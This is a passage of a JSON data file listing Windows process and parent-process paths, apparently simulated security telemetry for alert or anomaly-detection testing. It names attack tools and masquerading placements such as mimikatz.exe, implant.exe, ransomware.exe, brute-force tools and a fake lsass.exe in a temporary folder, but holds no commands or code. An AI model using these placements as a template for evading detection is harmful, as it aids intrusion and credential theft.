\\diagnostics\\\\usertmp\\\\implant.exe\",\"c:\\\\windows\\\\system32\\\\win32calc.exe\",\"c:\\\\diagnostics\\\\usertmp\\\\implant.exe\",\"c:\\\\windows\\\\system32\\\\win32calc.exe\",\"c:\\\\diagnostics\\\\usertmp\\\\implant.exe\",\"c:\\\\windows\\\\system32\\\\win32calc.exe\",\"c:\\\\diagnostics\\\\usertmp\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\win32calc.exe\",\"c:\\\\diagnostics\\\\usertmp\\\\powershell.exe\",\"c:\\\\windows\\\\system32\\\\win32calc.exe\",\"c:\\\\diagnostics\\\\usertmp\\\\powershell.exe\",\"c:\\\\windows\\\\system32\\\\win32calc.exe\",\"c:\\\\diagnostics\\\\usertmp\\\\powershell.exe\",\"c:\\\\windows\\\\system32\\\\win32calc.exe\",\"c:\\\\diagnostics\\\\usertmp\\\\powershell.exe\",\"c:\\\\windows\\\\system32\\\\win32calc.exe\",\"c:\\\\diagnostics\\\\usertmp\\\\powershell.exe\",\"c:\\\\windows\\\\system32\\\\win32calc.exe\",\"c:\\\\diagnostics\\\\usertmp\\\\powershell.exe\",\"c:\\\\windows\\\\system32\\\\win32calc.exe\",\"c:\\\\diagnostics\\\\usertmp\\\\powershell.exe\",\"c:\\\\windows\\\\system32\\\\win32calc.exe\",\"c:\\\\diagnostics\\\\usertmp\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\win32calc.exe\",\"c:\\\\diagnostics\\\\usertmp\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\win32calc.exe\",\"c:\\\\diagnostics\\\\usertmp\\\\powershell.exe\",\"c:\\\\windows\\\\system32\\\\win32calc.exe\",\"c:\\\\diagnostics\\\\usertmp\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\win32calc.exe\",\"c:\\\\diagnostics\\\\usertmp\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\win32calc.exe\",\"c:\\\\diagnostics\\\\usertmp\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\win32calc.exe\",\"c:\\\\diagnostics\\\\usertmp\\\\reg.exe\",\"c:\\\\windows\\\\system32\\\\win32calc.exe\",\"c:\\\\windows\\\\fonts\\\\csrss.exe\",\"c:\\\\windows\\\\system32\\\\win32calc.exe\",\"c:\\\\windows\\\\system32\\\\win32calc.exe\",\"c:\\\\windows\\\\system32\\\\werfault.exe\",\"c:\\\\windows\\\\fonts\\\\conhost.exe\",\"c:\\\\diagnostics\\\\usertmp\\\\mimikatz.exe\",\"c:\\\\diagnostics\\\\usertmp\\\\rundll32.exe\",\"c:\\\\windows\\\\fonts\\\\conhost.exe\",\"c:\\\\diagnostics\\\\usertmp\\\\regsvr32.exe\",\"c:\\\\windows\\\\system32\\\\tasklist.exe\",\"c:\\\\windows\\\\system32\\\\net.exe\",\"c:\\\\windows\\\\system32\\\\net1.exe\",\"c:\\\\windows\\\\system32\\\\whoami.exe\",\"c:\\\\windows\\\\system32\\\\hostname.exe\",\"c:\\\\windows\\\\system32\\\\netstat.exe\",\"c:\\\\windows\\\\system32\\\\net.exe\",\"c:\\\\windows\\\\system32\\\\net1.exe\",\"c:\\\\windows\\\\system32\\\\net.exe\",\"c:\\\\windows\\\\system32\\\\net1.exe\",\"c:\\\\windows\\\\system32\\\\net.exe\",\"c:\\\\windows\\\\system32\\\\net1.exe\",\"c:\\\\diagnostics\\\\usertmp\\\\rundll32.exe\",\"c:\\\\diagnostics\\\\usertmp\\\\reg.exe\",\"c:\\\\diagnostics\\\\usertmp\\\\reg.exe\",\"c:\\\\diagnostics\\\\usertmp\\\\ftp.exe\",\"c:\\\\diagnostics\\\\usertmp\\\\dubrute.exe\",\"c:\\\\diagnostics\\\\usertmp\\\\nlbrute.exe\",\"c:\\\\diagnostics\\\\usertmp\\\\reg.exe\",\"c:\\\\diagnostics\\\\usertmp\\\\reg.exe\",\"c:\\\\windows\\\\system32\\\\net.exe\",\"c:\\\\windows\\\\system32\\\\net.exe\",\"c:\\\\windows\\\\system32\\\\net1.exe\",\"c:\\\\diagnostics\\\\usertmp\\\\cmd.exe\",\"c:\\\\diagnostics\\\\usertmp\\\\netsh.exe\",\"c:\\\\diagnostics\\\\usertmp\\\\reg.exe\",\"c:\\\\diagnostics\\\\usertmp\\\\reg.exe\",\"c:\\\\diagnostics\\\\usertmp\\\\cmd.exe\",\"c:\\\\diagnostics\\\\usertmp\\\\rundll32.exe\",\"c:\\\\diagnostics\\\\usertmp\\\\42424.exe\",\"c:\\\\diagnostics\\\\usertmp\\\\rundll32.exe\",\"c:\\\\diagnostics\\\\usertmp\\\\rundll32.exe\",\"c:\\\\diagnostics\\\\usertmp\\\\1234.exe\",\"c:\\\\diagnostics\\\\usertmp\\\\rundll32.exe\",\"c:\\\\diagnostics\\\\usertmp\\\\rundll32.exe\",\"c:\\\\diagnostics\\\\usertmp\\\\reg.exe\",\"c:\\\\diagnostics\\\\usertmp\\\\reg.exe\",\"c:\\\\diagnostics\\\\usertmp\\\\tsetup.1.exe\",\"c:\\\\diagnostics\\\\usertmp\\\\rundll32.exe\",\"c:\\\\diagnostics\\\\usertmp\\\\netsh.exe\",\"c:\\\\diagnostics\\\\usertmp\\\\cmd.exe\",\"c:\\\\diagnostics\\\\usertmp\\\\cmd.exe\",\"c:\\\\diagnostics\\\\usertmp\\\\cmd.exe\",\"c:\\\\diagnostics\\\\usertmp\\\\cmd.exe\",\"c:\\\\diagnostics\\\\usertmp\\\\cmd.exe\",\"c:\\\\diagnostics\\\\usertmp\\\\cmd.exe\",\"c:\\\\diagnostics\\\\usertmp\\\\perfc.dat\",\"c:\\\\diagnostics\\\\usertmp\\\\sdopfjiowtbkjfnbeioruj.exe\",\"c:\\\\diagnostics\\\\usertmp\\\\doubleextension.pdf.exe\",\"c:\\\\windows\\\\system32\\\\vssadmin.exe\",\"c:\\\\windows\\\\system32\\\\conhost.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\conhost.exe\",\"c:\\\\diagnostics\\\\usertmp\\\\cmd.exe\",\"c:\\\\diagnostics\\\\usertmp\\\\svchost.exe\",\"c:\\\\diagnostics\\\\usertmp\\\\smss.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\diagnostics\\\\usertmp\\\\cmd.exe\",\"c:\\\\diagnostics\\\\usertmp\\\\asc_alerttest_662jfi039n.exe\",\"c:\\\\diagnostics\\\\usertmp\\\\powershell.exe\",\"c:\\\\diagnostics\\\\usertmp\\\\netsh.exe\",\"c:\\\\diagnostics\\\\usertmp\\\\wuauclt.exe\",\"c:\\\\windows\\\\softwaredistribution\\\\cscript.exe\",\"c:\\\\windows\\\\system32\\\\net1.exe\",\"c:\\\\diagnostics\\\\usertmp\\\\lsass.exe\",\"c:\\\\windows\\\\softwaredistribution\\\\cscript.exe\",\"c:\\\\windows\\\\system32\\\\net1.exe\",\"c:\\\\diagnostics\\\\usertmp\\\\cmd.exe\",\"c:\\\\diagnostics\\\\usertmp\\\\cacls.exe\",\"c:\\\\diagnostics\\\\usertmp\\\\cmd.exe\",\"c:\\\\diagnostics\\\\usertmp\\\\2840.exe\",\"c:\\\\diagnostics\\\\usertmp\\\\a_keygen.exe\",\"c:\\\\diagnostics\\\\usertmp\\\\cmd.exe\",\"c:\\\\diagnostics\\\\usertmp\\\\bittorrent.exe\",\"c:\\\\diagnostics\\\\usertmp\\\\netsh.exe\",\"c:\\\\diagnostics\\\\usertmp\\\\cmd.exe\",\"c:\\\\diagnostics\\\\usertmp\\\\ransomware.exe\",\"c:\\\\diagnostics\\\\usertmp\\\\cmd.exe\",\"c:\\\\diagnostics\\\\usertmp\\\\pcalua.exe\",\"c:\\\\diagnostics\\\\usertmp\\\\findstr.exe\",\"c:\\\\diagnostics\\\\usertmp\\\\odbcconf.exe\",\"c:\\\\diagnostics\\\\usertmp\\\\odbcconf.exe\",\"c:\\\\diagnostics\\\\usertmp\\\\sqldumper.exe\",\"c:\\\\diagnostics\\\\usertmp\\\\mt.exe\",\"c:\\\\diagnostics\\\\usertmp\\\\mt.exe\",\"c:\\\\diagnostics\\\\usertmp\\\\hd.exe\",\"c:\\\\diagnostics\\\\usertmp\\\\hd.exe\",\"c:\\\\diagnostics\\\\usertmp\\\\netsh.exe\",\"c:\\\\diagnostics\\\\usertmp\\\\certutil.exe\",\"c:\\\\diagnostics\\\\usertmp\\\\reg.exe\",\"c:\\\\diagnostics\\\\usertmp\\\\reg.exe\",\"c:\\\\windows\\\\system32\\\\sc.exe\",\"c:\\\\windows\\\\system32\\\\sc.exe\",\"c:\\\\windows\\\\system32\\\\taskhostw.exe\",\"c:\\\\program files (x86)\\\\google\\\\update\\\\googleupdate.exe\",\"c:\\\\windows\\\\system32\\\\wermgr.exe\",\"c:\\\\program files (x86)\\\\google\\\\update\\\\googleupdate.exe\",\"c:\\\\windows\\\\system32\\\\musnotification.exe\",\"c:\\\\windows\\\\system32\\\\services.exe\",\"c:\\\\windows\\\\servicing\\\\trustedinstaller.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\sppsvc.exe\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\waappagent.exe\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\collectguestlogs.exe\",\"c:\\\\windows\\\\system32\\\\conhost.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\conhost.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\dism.exe\",\"c:\\\\windows\\\\system32\\\\conhost.exe\",\"c:\\\\windows\\\\temp\\\\cc563bbe-de32-44d3-8e35-f3fc78e72e40\\\\dismhost.exe\"],\"new_process_lc_par\":[\"NaN\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ct_602681692\\\\nativedsc\\\\desiredstateconfiguration\\\\asmhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ct_602681692\\\\nativedsc\\\\desiredstateconfiguration\\\\asmhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ct_602681692\\\\nativedsc\\\\desiredstateconfiguration\\\\asmhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ct_602681692\\\\nativedsc\\\\desiredstateconfiguration\\\\asmhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ct_602681692\\\\nativedsc\\\\desiredstateconfiguration\\\\asmhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ct_602681692\\\\nativedsc\\\\desiredstateconfiguration\\\\asmhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ct_602681692\\\\nativedsc\\\\desiredstateconfiguration\\\\asmhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ct_602681692\\\\nativedsc\\\\desiredstateconfiguration\\\\asmhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf-64\\\\desiredstateconfiguration\\\\dscrun.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ct_602681692\\\\nativedsc\\\\desiredstateconfiguration\\\\asmhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ct_602681692\\\\nativedsc\\\\desiredstateconfiguration\\\\asmhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ct_602681692\\\\nativedsc\\\\desiredstateconfiguration\\\\asmhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ct_602681692\\\\nativedsc\\\\desiredstateconfiguration\\\\asmhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ct_602681692\\\\nativedsc\\\\desiredstateconfiguration\\\\asmhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ct_602681692\\\\nativedsc\\\\desiredstateconfiguration\\\\asmhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ct_602681692\\\\nativedsc\\\\desiredstateconfiguration\\\\asmhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ct_602681692\\\\nativedsc\\\\desiredstateconfiguration\\\\asmhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ct_602681692\\\\nativedsc\\\\desiredstateconfiguration\\\\asmhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ct_602681692\\\\nativedsc\\\\desiredstateconfiguration\\\\asmhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ct_602681692\\\\nativedsc\\\\desiredstateconfiguration\\\\asmhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ct_602681692\\\\nativedsc\\\\desiredstateconfiguration\\\\asmhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ct_602681692\\\\nativedsc\\\\desiredstateconfiguration\\\\asmhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ct_602681692\\\\nativedsc\\\\desiredstateconfiguration\\\\asmhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ct_602681692\\\\nativedsc\\\\desiredstateconfiguration\\\\asmhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ct_602681692\\\\nativedsc\\\\desiredstateconfiguration\\\\asmhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ct_602681692\\\\nativedsc\\\\desiredstateconfiguration\\\\asmhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ct_602681692\\\\nativedsc\\\\desiredstateconfiguration\\\\asmhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ct_602681692\\\\nativedsc\\\\desiredstateconfiguration\\\\asmhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ct_602681692\\\\nativedsc\\\\desiredstateconfiguration\\\\asmhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ct_602681692\\\\nativedsc\\\\desiredstateconfiguration\\\\asmhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ct_602681692\\\\nativedsc\\\\desiredstateconfiguration\\\\asmhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ct_602681692\\\\nativedsc\\\\desiredstateconfiguration\\\\asmhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ct_602681692\\\\nativedsc\\\\desiredstateconfiguration\\\\asmhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ct_602681692\\\\nativedsc\\\\desiredstateconfiguration\\\\asmhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ct_602681692\\\\nativedsc\\\\desiredstateconfiguration\\\\asmhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ct_602681692\\\\nativedsc\\\\desiredstateconfiguration\\\\asmhost.exe\",\"NaN\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"NaN\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\net.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\net.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\net.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\net.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\diagnostics\\\\usertmp\\\\regsvr32.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\diagnostics\\\\usertmp\\\\suchost.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\diagnostics\\\\usertmp\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\diagnostics\\\\usertmp\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\diagnostics\\\\usertmp\\\\certutil.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\diagnostics\\\\usertmp\\\\implant.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\diagnostics\\\\usertmp\\\\implant.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\diagnostics\\\\usertmp\\\\implant.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\diagnostics\\\\usertmp\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\diagnostics\\\\usertmp\\\\powersh